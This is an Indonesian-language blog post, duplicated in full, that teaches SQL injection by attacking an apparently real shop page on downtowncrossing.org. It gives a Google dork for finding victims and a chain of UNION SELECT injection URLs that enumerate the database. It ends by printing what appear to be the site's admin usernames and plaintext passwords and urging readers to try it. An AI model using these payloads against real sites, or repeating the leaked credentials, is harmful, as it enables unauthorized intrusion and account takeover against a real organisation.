SQL Injection
Pernah lihat seorang attacker mengubah halaman utama web.???atau pernah bertanya - tanya teknik apa yang di gunakan para ttacker tersebut.??
Salah satu teknik yang di gunakan dalam mendapatkan username dan password admin adalah dengan cara sql injection. Sql injection adalah sebuah teknik yang memanfaatkan kelemahan script yang di buat oleh web master. Kita bisa memanfaatkan kesalahan itu agar kita bisa mendapatkan apa yang kita inginkan. Huh kayanya bahasanya di putar2 aja nie hehehe, Baiklah tanpa banyak basa - basi lagi kita mulai saja. Siapkan peralatan kita sebelm berperang y hehehehe
kita bisa mencari korban dengan dork sql dengan bantuan paman google contoh dork inurl:.php?id=
Okai lah kita asumsikan sudah mendapatkan site http://www.downtowncrossing.org/shop/shop.php?id=103
kita mencari tau site itu apakah vuln atau tidak kita dapat mengetesnya dengan menambahkan tanda kutip sati di belakang angka itu seperti
http://www.downtowncrossing.org/shop/shop.php?id=103'
Apabila site itu berubah tampilah dan mengalami error kita bisa mencoba cara selanjutnya mencari banyak kolum yang yang terdapat di site tersebut dengan cara
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 1--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 2--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 3--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 4--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 5--
nah disitu kita bisa lihat perbedaannya di dalam order by 1 sampai dengan 4 tidak mengalamin error dalam site tersebut tetapi di dalam order by 5-- site tersebut mengalami error itu berarti kolom yang di miliki oleh web tersebut 4 kolum atau site tersebut mempunyai 4 kolum
tahap selanjutnya adalah kita mencari angka mgic yang terdapat di site tersebut. Giman kita mencarinya.??yah dengan cara menambahkan union select atau bisa di lihat di contoh bawah ini
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,2,3,4--
setelah itu keluar angka magic yang bisa kita serang dalam kasus ini angka yang keluar adalah angka 2 dan angka 4
nah ketahap selanjutnya mencari version mysql yang di pake dengan cara meletakkan version() di angka magic yang keluar kita berharap version yang di pakenya adalah versi 5, karna apabila versi 4 di mysql tidak terdapat table schema jadi kita harus menebak-nebak pa yang ingin kita cari
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,4--nah loh tuh keluar lah tuh versi yang di pake sama site tersebut adalah versi 5 jadi tahap selanjutnya bisa di teruskan
setelah mencari versi kita akan mencari informasi nama table yang terdapat di site tersebut dengan cara menambah kan group concat(table_name) di dalama angka magic itu dan from information_schema .tables where table_schema=database()--
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_concat(table_name) from information_schema.tables where table_schema=database()--
di situ akan terlihat banyak tabel yang keluar dan kita akan mengincar tabel admin dan akan melhat apa saja yang terdapat di tabel admin itu dengan meribah admin (string) ke 0x61646d696e(hexa) dapat diliha
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_conca(column_name) from information_schema.columns where table_name=0x61646d696e--
nah lw tuh ada yang keluar di halaman webnya yang berupa user_id,username,password
saya ingin mengetahui lagi nie da apa aja y di balik username dan password itu...maka saya mencoba memasukkan di dalam group_concat(username,0x3a,password) from admin (karna kita ingin melihat isi dari admin itu)
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_concat(username,0x3a,password) from admin
nah ada yang keluar tuh
dca1:dertg1,dca2:kate
ada username dan passwordnya tapi disini ada yang janggal ko passwordnya gk di encryp y.???
yaudah deh karna saya orang awam dengan hal yang beginian langsung saja saya mencari halaman adminnya
Sekian dulu coretan dari saya n selamat mencoba....
Salah satu teknik yang di gunakan dalam mendapatkan username dan password admin adalah dengan cara sql injection. Sql injection adalah sebuah teknik yang memanfaatkan kelemahan script yang di buat oleh web master. Kita bisa memanfaatkan kesalahan itu agar kita bisa mendapatkan apa yang kita inginkan. Huh kayanya bahasanya di putar2 aja nie hehehe, Baiklah tanpa banyak basa - basi lagi kita mulai saja. Siapkan peralatan kita sebelm berperang y hehehehe
kita bisa mencari korban dengan dork sql dengan bantuan paman google contoh dork inurl:.php?id=
Okai lah kita asumsikan sudah mendapatkan site http://www.downtowncrossing.org/shop/shop.php?id=103
kita mencari tau site itu apakah vuln atau tidak kita dapat mengetesnya dengan menambahkan tanda kutip sati di belakang angka itu seperti
http://www.downtowncrossing.org/shop/shop.php?id=103'
Apabila site itu berubah tampilah dan mengalami error kita bisa mencoba cara selanjutnya mencari banyak kolum yang yang terdapat di site tersebut dengan cara
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 1--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 2--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 3--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 4--
http://www.downtowncrossing.org/shop/shop.php?id=103 order by 5--
nah disitu kita bisa lihat perbedaannya di dalam order by 1 sampai dengan 4 tidak mengalamin error dalam site tersebut tetapi di dalam order by 5-- site tersebut mengalami error itu berarti kolom yang di miliki oleh web tersebut 4 kolum atau site tersebut mempunyai 4 kolum
tahap selanjutnya adalah kita mencari angka mgic yang terdapat di site tersebut. Giman kita mencarinya.??yah dengan cara menambahkan union select atau bisa di lihat di contoh bawah ini
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,2,3,4--
setelah itu keluar angka magic yang bisa kita serang dalam kasus ini angka yang keluar adalah angka 2 dan angka 4
nah ketahap selanjutnya mencari version mysql yang di pake dengan cara meletakkan version() di angka magic yang keluar kita berharap version yang di pakenya adalah versi 5, karna apabila versi 4 di mysql tidak terdapat table schema jadi kita harus menebak-nebak pa yang ingin kita cari
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,4--nah loh tuh keluar lah tuh versi yang di pake sama site tersebut adalah versi 5 jadi tahap selanjutnya bisa di teruskan
setelah mencari versi kita akan mencari informasi nama table yang terdapat di site tersebut dengan cara menambah kan group concat(table_name) di dalama angka magic itu dan from information_schema .tables where table_schema=database()--
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_concat(table_name) from information_schema.tables where table_schema=database()--
di situ akan terlihat banyak tabel yang keluar dan kita akan mengincar tabel admin dan akan melhat apa saja yang terdapat di tabel admin itu dengan meribah admin (string) ke 0x61646d696e(hexa) dapat diliha
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_conca(column_name) from information_schema.columns where table_name=0x61646d696e--
nah lw tuh ada yang keluar di halaman webnya yang berupa user_id,username,password
saya ingin mengetahui lagi nie da apa aja y di balik username dan password itu...maka saya mencoba memasukkan di dalam group_concat(username,0x3a,password) from admin (karna kita ingin melihat isi dari admin itu)
http://www.downtowncrossing.org/shop/shop.php?id=-103 union select 1,version(),3,group_concat(username,0x3a,password) from admin
nah ada yang keluar tuh
dca1:dertg1,dca2:kate
ada username dan passwordnya tapi disini ada yang janggal ko passwordnya gk di encryp y.???
yaudah deh karna saya orang awam dengan hal yang beginian langsung saja saya mencari halaman adminnya
Sekian dulu coretan dari saya n selamat mencoba....
SQL Injection
![SQL Injection]()
Reviewed by Unknown
on
7:12 PM
Rating:
